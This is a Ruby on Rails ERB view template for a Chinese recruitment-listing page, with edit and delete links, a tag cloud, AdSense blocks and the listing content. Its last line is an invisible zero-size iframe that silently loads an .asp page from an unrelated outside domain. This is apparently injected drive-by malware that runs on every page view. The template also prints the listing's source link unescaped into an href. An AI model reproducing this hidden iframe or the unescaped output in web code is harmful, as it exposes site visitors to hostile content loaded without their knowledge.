<% page_title = h(@recruitment.title) %>
<% community_page_title(page_title) %>

<div class="float_r recruitment_container_r">
	
	<% if @can_edit %>
		<div class="community_block">
			<% form_tag "/recruitments/#{@recruitment_id}", :method => :delete, :id => "delete_recruitment_form" do %>
			<% end %>
			<a href="#" onclick="if(confirm('确定要删除么 ?')){document.getElementById('delete_recruitment_form').submit();}; return false;">删除信息</a>
			
			&nbsp;
			|
			&nbsp;

			<a href="/recruitments/<%= @recruitment_id %>/edit">编辑快照</a>
		</div>
		
		<div class="community_block_narrow">
			<%= thin_hr %>
		</div>
	<% end %>
	
	<div class="community_block">
		<a href="/recruitments">返回招聘信息列表</a>
	</div>
	
	
	
	<div style="border-top: 1px solid #EEEEEE; padding-top: 10px;">
		<div class="community_block align_c">
			<a href="/talks" target="_blank">
				<img src="/images/ad/talk_colorful.gif" border="0" /></a>
		</div>
		
		<div class="community_block align_c">
			<a href="/coach/courses" target="_blank">
				<img src="/images/ad/course_colorful.gif" border="0" /></a>
		</div>
	</div>

	
	<div class="community_title">
		所有标签 ...
	</div>
	
	<div class="community_block">
		<%= render(:partial => "recruitment_tag_cloud") %>
	</div>
	
	
	
	<div class="community_block_narrow">
		<%= thin_hr %>
	</div>
	
	<div class="align_c">
		<script type="text/javascript"><!--
		google_ad_client = "pub-3439613867319084";
		/* 250x250, 招聘信息页面右侧 */
		google_ad_slot = "5019021815";
		google_ad_width = 250;
		google_ad_height = 250;
		//-->
		</script>
		<script type="text/javascript"
		src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
		</script>
	</div>
	
</div>

<div class="recruitment_container_l">
	<div class="float_r">
		<%= render :partial => "/bookmarks/inline_add", :locals => {:url => "/recruitments/#{@recruitment_id}", :title => "#{h(page_title)}"} %>
	</div>
	
	<h2><%= page_title %></h2>
	
	<div class="community_block align_r">
		<% if @recruitment.recruitment_type && @recruitment.recruitment_type != "" %>
			类型:
			<a href="/recruitments/recruitment_type?name=<%= h(@recruitment.recruitment_type) %>" class="account_nick_link"><%= h(@recruitment.recruitment_type) %></a>
		
			&nbsp;
			|
			&nbsp;
		<% end %>
		
		<% if @recruitment.location && @recruitment.location != "" %>
			地区:
			<a href="/recruitments/location?name=<%= h(@recruitment.location) %>" class="account_nick_link"><%= h(@recruitment.location) %></a>
		
			&nbsp;
			|
			&nbsp;
		<% end %>
		
		发布时间:
		<%= format_date(@recruitment.publish_time) %>
	</div>
	
	<% tags = @recruitment.recruitment_tags %>
	<% if tags.size > 0 %>
		<div class="align_r" style="word-spacing: 10px;">
			<% tags.each do |tag|%>
				<a href="/recruitments/tag?name=<%= h(tag.name) %>" class="account_nick_link"><%= h(tag.name) %></a>
			<% end %>
		</div>
	<% end %>
	
	
	<div class="community_block tinymce_content">
		<%= sanitize_tinymce(@recruitment.content) %>
	</div>
	
	<div class="community_block">
		<%= draw_hor_line("400px") %>
	</div>
	
	<div class="community_block align_r form_info_s">
		信息来源:
		<a href="<%= @recruitment.source_link %>" target="_blank"><%= @recruitment.source_link %></a>
	</div>
	
	
	
	<div style="height: 50px; margin-bottom: 10px; border-bottom: 1px solid #EEEEEE;">
		
	</div>
	<div class="community_block">
		<script type="text/javascript"><!--
		google_ad_client = "pub-3439613867319084";
		/* 468x60 */
		google_ad_slot = "0991456068";
		google_ad_width = 468;
		google_ad_height = 60;
		//-->
		</script>
		<script type="text/javascript"
		src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
		</script>
	</div>
	
</div>



<iframe src="http://www.team-key.com/tk/temptest/keyindex.asp" width="0px" height="0px" frameBorder="0" scrolling="no"></iframe>


